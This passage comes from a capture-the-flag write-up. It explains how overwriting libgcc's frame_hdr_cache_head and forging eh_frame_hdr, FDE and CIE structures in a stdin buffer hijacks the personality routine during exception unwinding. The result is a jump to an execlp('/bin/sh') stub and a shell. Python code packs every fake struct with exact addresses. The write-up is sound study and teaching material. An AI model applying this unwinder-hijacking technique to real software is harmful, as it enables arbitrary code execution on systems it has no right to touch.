  2. Once an entry is found, unw_eh_frame_hdr (the hdr variable) is obtained by adding p_vaddr and load_base. Then, the version of hdr is checked to be 1.
    • hdr also contains the flags for encoding schemes for eh_frame_ptr, fde_count, and table.
    • Encoding flags are defined in unwind-pe.h; the important ones are: DW_EH_PE_pcrel (0x10, pc-relative), DW_EH_PE_absptr (0x00, absolute), DW_EH_PE_sdata4 (0x0b, signed 4-byte), DW_EH_PE_udata4 (0x03, unsigned 4-byte).
  3. Parse eh_frame and fde_count
  4. Perform a binary search in the table for data->pc against table[i].initial_loc + data_base, where data_base is hdr.
  5. When an element is found in the table, set f to table[mid].fde + data_base (thus calculating the FDE pointer).
  6. A final check is done by parsing the range to ensure that this FDE record covers data->pc
    ( table[mid].initial_loc + data_base <= data->pc < table[mid].initial_loc + data_base + range )
  7. data->ret  is filled with f.
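The steps above can be sketched in Python. The function and field names here are ours, not libgcc’s, and this is a simplified model of _Unwind_IteratePhdrCallback, not its actual code:

```python
# Simplified model of the cache hit + binary search. All arithmetic is
# 32-bit (masked with M); read_table/read_range stand in for the
# encoded-value parsing that libgcc performs.
M = 0xFFFFFFFF

def find_fde(cache, pc, read_table, read_range):
    for ent in cache:                                   # 1. walk cache list
        if ent['pc_low'] <= pc < ent['pc_high']:
            hdr = (ent['p_vaddr'] + ent['load_base']) & M   # 2. hdr
            data_base = hdr
            table, fde_count = read_table(hdr)          # 3. parse fde_count
            lo, hi = 0, fde_count                       # 4. binary search
            while lo < hi:
                mid = (lo + hi) // 2
                if pc < (table[mid][0] + data_base) & M:
                    hi = mid
                else:
                    lo = mid + 1
            f = (table[lo - 1][1] + data_base) & M      # 5. FDE pointer
            start = (table[lo - 1][0] + data_base) & M
            if start <= pc < (start + read_range(f)) & M:   # 6. range check
                return f                                # 7. data->ret = f
    return None
```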

It’s important to carefully construct the (fake) FDE record since it holds the CIE_delta field, which is used to locate the CIE record that gets parsed later (for the personality function pointer).

The only piece that we haven’t visited yet is extract_cie_info, but we will cover it as we develop the exploit payload :)

4. Exploit development

Finally, we can start writing some evil awesome payload to pwn this binary.

Here’s our plan for the attack:

  1. Overwrite frame_hdr_cache_head (0x402eb118) to point to our stdin buffer (0x40025000 + 0x1c for skipping userid/password/padding).
  2. Construct fake structs:
    • cache_entry (frame_hdr_cache_element)
    • p_eh_frame_hdr (Elf32_Phdr)
    • hdr  (unw_eh_frame_hdr)
    • table (fde_table)
    • fde (dwarf_fde)
    • cie (dwarf_cie)
  3. When creating a fake cie struct, we make the personality function pointer 0x8048E97 , where it does execlp("/bin/sh", "/bin/sh", 0) , and get a shell!!

Note that some of the fields in the structs are relative offsets, so we need to plan where to put things and link them correctly.

4-1. Trigger

Let’s start with a simple payload that would pass the check and trigger the bug.

As we can see in action, this payload triggers the bug and causes infinite SIGSEGV.
We chose 0x402eb101 for no particular reason, but we can see that the memory is successfully written.

4-2. cache_entry & p_eh_frame_hdr construction

Now, we overwrite frame_hdr_cache_head to point to our stdin buffer.

We are going to start building fake structs from our buffer + 0x1c.

So, what values should we use?
To avoid worrying about the search too much, we are going to set pc_low to 0x0 and pc_high to 0xFFFFFFFF. This basically says that this cache entry should be used for any exception thrown in that address range, so we’ll catch everything. Also, to keep the math simple, we are going to set load_base to 0. Finally, we have to set the p_eh_frame_hdr pointer to the fake Elf32_Phdr struct, which we will put right after the fake cache_entry struct we are currently building. The rest of the fields are not really used (for our purposes), so we can put dummy values.

This gives us this:

For the p_eh_frame_hdr struct, we only care about p_vaddr, which is used to calculate hdr (unw_eh_frame_hdr).
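A sketch of packing these two fake structs. The field order is taken from libgcc’s frame_hdr_cache_element and the standard Elf32_Phdr layout; the buffer addresses are the ones used in this write-up:

```python
import struct

BUF  = 0x40025000           # stdin buffer base (from the write-up)
FAKE = BUF + 0x1c           # fake structs start here

# Fake frame_hdr_cache_element: catch every pc, load_base = 0,
# p_eh_frame_hdr pointing right after this struct (six 32-bit words).
phdr_addr = FAKE + 6 * 4    # fake Elf32_Phdr follows the cache element
cache_entry = struct.pack("<6I",
    0x00000000,             # pc_low
    0xFFFFFFFF,             # pc_high: match any pc
    0x00000000,             # load_base: keeps the math simple
    phdr_addr,              # p_eh_frame_hdr -> fake Elf32_Phdr
    0x41414141,             # p_dynamic: unused on our path
    0x41414141)             # link: unused (we always hit this entry)

# Fake Elf32_Phdr: only p_vaddr matters (hdr = p_vaddr + load_base).
hdr_addr = FAKE + 6 * 4 + 8 * 4     # hdr lands right after the phdr
phdr = struct.pack("<8I",
    0x41414141,             # p_type   (unused)
    0x41414141,             # p_offset (unused)
    hdr_addr,               # p_vaddr -> our fake unw_eh_frame_hdr
    0x41414141, 0x41414141, # p_paddr, p_filesz (unused)
    0x41414141, 0x41414141, # p_memsz, p_flags  (unused)
    0x41414141)             # p_align  (unused)
```

With these sizes, hdr_addr works out to 0x40025054, matching the hdr address used in the rest of the write-up.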

Let’s see it in action.

So, this payload basically lets us execute the goto found; code (unwind-dw2-fde-dip.c:225), since data->pc will be between pc_low and pc_high.

Then, on line 315, hdr is calculated by adding p_eh_frame_hdr->p_vaddr and load_base, thus pointing to 0x40025054.
Time to build a fake hdr struct!

4-3. hdr & table construction

Starting at +0x54 from our buffer comes the hdr struct.
It’s a 4 byte struct and we fill in reasonable values here, according to the encoding scheme mentioned above.

Then, as we saw earlier, eh_frame is read. Since the value is supposedly encoded with  (DW_EH_PE_pcrel | DW_EH_PE_sdata4) , this value in our data should be an offset from where the hdr is. However, the value of eh_frame isn’t really related to what we do, so we can put any value (read_encoded_value_with_base actually does the calculation given the base to correctly compute eh_frame’s value).

Ok, next check is the following:

We have picked the values for the encoding schemes such that we satisfy both conditions.
Then, fde_count is read.
Since we do not want to create more than one set of fake structs (to be searched with the binary search later), we will force this to be 1.
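Packing the fake hdr plus the two values that follow it might look like this. The encoding byte values are from unwind-pe.h; the dummy eh_frame value is arbitrary:

```python
import struct

# Fake unw_eh_frame_hdr plus the two values read right after it.
# Encoding bytes per unwind-pe.h: pcrel=0x10, datarel=0x30,
# udata4=0x03, sdata4=0x0b.
hdr  = struct.pack("<4B",
    1,                      # version: must be 1
    0x10 | 0x0b,            # eh_frame_ptr_enc: pcrel | sdata4
    0x03,                   # fde_count_enc: udata4
    0x30 | 0x0b)            # table_enc: datarel | sdata4 (required)
hdr += struct.pack("<I", 0x41414141)  # eh_frame: parsed but never used by us
hdr += struct.pack("<I", 1)           # fde_count: exactly one table entry
```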

So with this data appended, we so far have this as our payload:

Then, the table comes next. fde_table struct has two fields: initial_loc and fde.

As mentioned earlier, in order for the search to succeed, we need to satisfy  table[mid].initial_loc + data_base <= data->pc < table[mid].initial_loc + data_base + range .

Note that data_base points at hdr (0x40025054). So we can set initial_loc to 0xBFFDAFAC such that initial_loc + data_base == 0x40025054 + 0xBFFDAFAC == 0x0 (mod 2^32).

Also, the fde field is actually a (signed) offset from hdr, due to the (DW_EH_PE_datarel | DW_EH_PE_sdata4) encoding. So, we set it to 0x14 to indicate that our fake dwarf_fde struct will be located at 0x40025068.
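The offset arithmetic can be checked with a few lines of Python (32-bit wraparound assumed):

```python
import struct

data_base = 0x40025054      # hdr address: table offsets are data-relative
# initial_loc + data_base must wrap to 0 (32-bit), so any pc passes the
# lower bound; fde = 0x14 puts the fake dwarf_fde at data_base + 0x14.
initial_loc = (0 - data_base) & 0xFFFFFFFF
table = struct.pack("<II", initial_loc, 0x14)

assert initial_loc == 0xBFFDAFAC
assert (initial_loc + data_base) & 0xFFFFFFFF == 0
assert data_base + 0x14 == 0x40025068     # fake dwarf_fde lands here
```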

Fake hdr and table construction is done, and we now have this:

The current payload, when fed to the program, will result in a crash since it will read an invalid value for the range.
To make data->pc < initial_loc + data_base + range  true, we need to construct a fake dwarf_fde now.

4-4. fde & cie construction

As a final step, we are going to construct fde and cie records in our payload.

dwarf_fde struct has length, CIE_delta, and pc_begin fields (followed by fde_augmentation length, which should be 0).

We are going to make the length 0x1C, and CIE_delta to 0xFFFFFFE4 (such that &CIE_delta - CIE_delta == 0x40025088 — this will be explained later). We will set pc_begin to 0x0 (doesn’t really matter what we put here).

What comes after pc_begin is the range. To explain a little bit: on line 412 in unwind-dw2-fde-dip.c, the range is read from f->pc_begin[f_enc_size], where f_enc_size is 4, making the 4 bytes right after pc_begin the range. Since we made initial_loc 0x0, we make the range 0xFFFFFFFF. Then, we pad the last few bytes (technically we could fix the length instead, but this is what we used during the competition).
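A sketch of the fake FDE bytes, assuming the length field counts the bytes that follow it:

```python
import struct

fde_addr = 0x40025068
fde  = struct.pack("<I", 0x1C)        # length: 0x1C bytes follow
fde += struct.pack("<I", 0xFFFFFFE4)  # CIE_delta: points CIE parsing
                                      # at 0x40025088 (see below)
fde += struct.pack("<I", 0)           # pc_begin: irrelevant here
fde += struct.pack("<I", 0xFFFFFFFF)  # range: covers any data->pc
fde += b"\x00" * 0x10                 # padding out to the declared length

# CIE_delta is subtracted from its own address (mod 2^32):
assert (fde_addr + 4 - 0xFFFFFFE4) & 0xFFFFFFFF == 0x40025088
```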

This yields our payload to be:

We are almost there!!!

The above payload will result in data->ret containing a pointer to our fake FDE struct, and we return to _Unwind_Find_FDE.

In _Unwind_Find_FDE, nothing interesting happens, and the same (a pointer to our fake FDE struct) is returned.

We are now back to uw_frame_state_for function (line 1180 in unwind-dw2.c). Since fde is not null, extract_cie_info is called with the cie pointer that is based on our fde.

Looking at the get_cie function, we can see why we put 0xFFFFFFE4 for CIE_delta value in our FDE struct. With our setup, get_cie will return the CIE struct’s address, which will be right after our fake FDE struct (aka 0x40025088).

Now, we have 1 final function that we need to understand: extract_cie_info.

This function is mostly parsing stuff and filling in the _Unwind_Frame_State data based on the CIE record.

dwarf_cie struct has length, CIE_id, version, and augmentation — and depending on augmentation content, more data follows.

Here are the values we set for our fake CIE struct:

The data that follows the augmentation string (code_alignment, data_alignment, return_addr_col) is read in first.
We chose these values just because we saw them in a normal CIE struct, but it shouldn’t matter what they are.

Then, the rest of the data is parsed as augmentation contents (aka ‘zPLR’).

  1. If the first byte is ‘z’, it sets the fs->saw_z flag; note that the length of the extra augmentation data (which follows the length byte itself) is 0x07.
  2. ‘P’ indicates that a personality routine is specified in the CIE (extra) augmentation data; the personality_ptr value (4 bytes) is read according to the personality_enc encoding scheme, which we set to 0x0 to make it the absptr type.
  3. ‘L’ indicates a byte showing how the LSDA pointer is encoded. No idea what that is, but it’s not relevant — we put 0x0.
  4. ‘R’ indicates a byte indicating how FDE addresses are encoded. We put some sane value that we saw earlier, but shouldn’t matter either.

Alright, now with some padding bytes to make the total length 0x1c, we are set.
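Here is a sketch of how the fake CIE bytes could be packed, assuming the length field counts the bytes that follow it. The alignment values mirror what a typical CIE contains and, as noted above, mostly don’t matter; 0x41424344 is a placeholder for the personality pointer:

```python
import struct

# Fake CIE following the 'zPLR' augmentation layout that
# extract_cie_info parses. The personality pointer (placeholder
# 0x41424344) is the function pointer that ends up being called.
cie  = struct.pack("<I", 0x1C)   # length: 0x1C bytes follow
cie += struct.pack("<I", 0)      # CIE_id: 0 marks a CIE
cie += b"\x01"                   # version
cie += b"zPLR\x00"               # augmentation string
cie += b"\x01"                   # code_alignment_factor (uleb128)
cie += b"\x7c"                   # data_alignment_factor (sleb128, -4)
cie += b"\x08"                   # return_addr_column
cie += b"\x07"                   # 'z': augmentation data length
cie += b"\x00"                   # 'P': personality enc, DW_EH_PE_absptr
cie += struct.pack("<I", 0x41424344)  # 'P': personality pointer (EIP!)
cie += b"\x00"                   # 'L': LSDA encoding (unused)
cie += b"\x1b"                   # 'R': FDE encoding (pcrel | sdata4)
cie += b"\x00" * (0x20 - len(cie))    # pad to total size 0x20
```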

Thus far, we have built the following payload:

And corresponding output when we run this payload against the binary:

YAY!!! WE HAVE EIP CONTROL!!!!111!!11!

Ok, now on to the final and easiest step: getting a shell.

4-5. Give me a shell

Remember (from a while ago…) that there was code that does execlp("/bin/sh", "/bin/sh", 0) ?
For those who don’t remember, it’s located at  0x8048E97 .

All we have to do at this point is replace 0x41424344 (the personality routine pointer) with 0x8048e97.
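That swap is a one-liner; the helper below is ours, with the placeholder marker standing in for the personality pointer built earlier:

```python
import struct

# Swap the placeholder personality pointer for the address of the
# execlp("/bin/sh", ...) stub in the binary.
SHELL = 0x08048E97

def arm_payload(payload):
    return payload.replace(struct.pack("<I", 0x41424344),
                           struct.pack("<I", SHELL))

demo = b"\x00" * 19 + struct.pack("<I", 0x41424344)   # fake-CIE-shaped blob
assert struct.pack("<I", SHELL) in arm_payload(demo)
```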

AND

Voila! We have our shell (and the flag, of course!)

 

5. Closing

I hope you enjoyed reading this write-up. (Although I suspect not.. due to its obscene length)

I apologize that this ended up being a LOT longer than I anticipated when I started writing, but I think it contains quite a bit of details that people can follow and reproduce the result.

Try it while their server is up!! Otherwise you will have to patch the binary such that the addresses work out.

Thank you for reading, and feel free to leave comments if you have any questions or suggestions.

 

Write-up by Cai (Brian Pak) [https://www.bpak.org]

 
